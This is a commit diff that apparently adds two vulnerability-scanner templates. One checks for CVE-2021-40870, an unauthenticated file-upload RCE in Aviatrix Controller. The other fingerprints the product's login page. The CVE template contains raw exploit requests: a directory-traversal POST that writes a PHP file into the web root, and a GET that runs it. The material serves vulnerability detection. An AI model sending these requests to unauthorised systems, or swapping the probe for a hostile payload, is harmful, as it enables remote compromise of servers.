Merge pull request #2773 from pikpikcu/patch-292

Added Aviatrix Controller  RCE

cves/2021/CVE-2021-40870.yaml

@@ -0,0 +1,38 @@
+id: CVE-2021-40870
+
+info:
+  name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
+  author: pikpikcu
+  severity: critical
+  description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
+  reference:
+    - https://wearetradecraft.com/advisories/tc-2021-0002/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-40870
+  tags: cve,cve2021,rce,aviatrix
+
+requests:
+  - raw:
+      - |
+        POST /v1/backend1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=HACKERMAN<?php phpinfo()?>
+
+      - |
+        GET /v1/{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - 'HACKERMAN'
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and

technologies/aviatrix-detect.yaml

@@ -0,0 +1,24 @@
+id: aviatrix-detect
+
+info:
+  name: Aviatrix Detect
+  author: pikpikcu
+  severity: info
+  tags: tech,aviatrix
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>Aviatrix Controller</title>"
+
+      - type: status
+        status:
+          - 200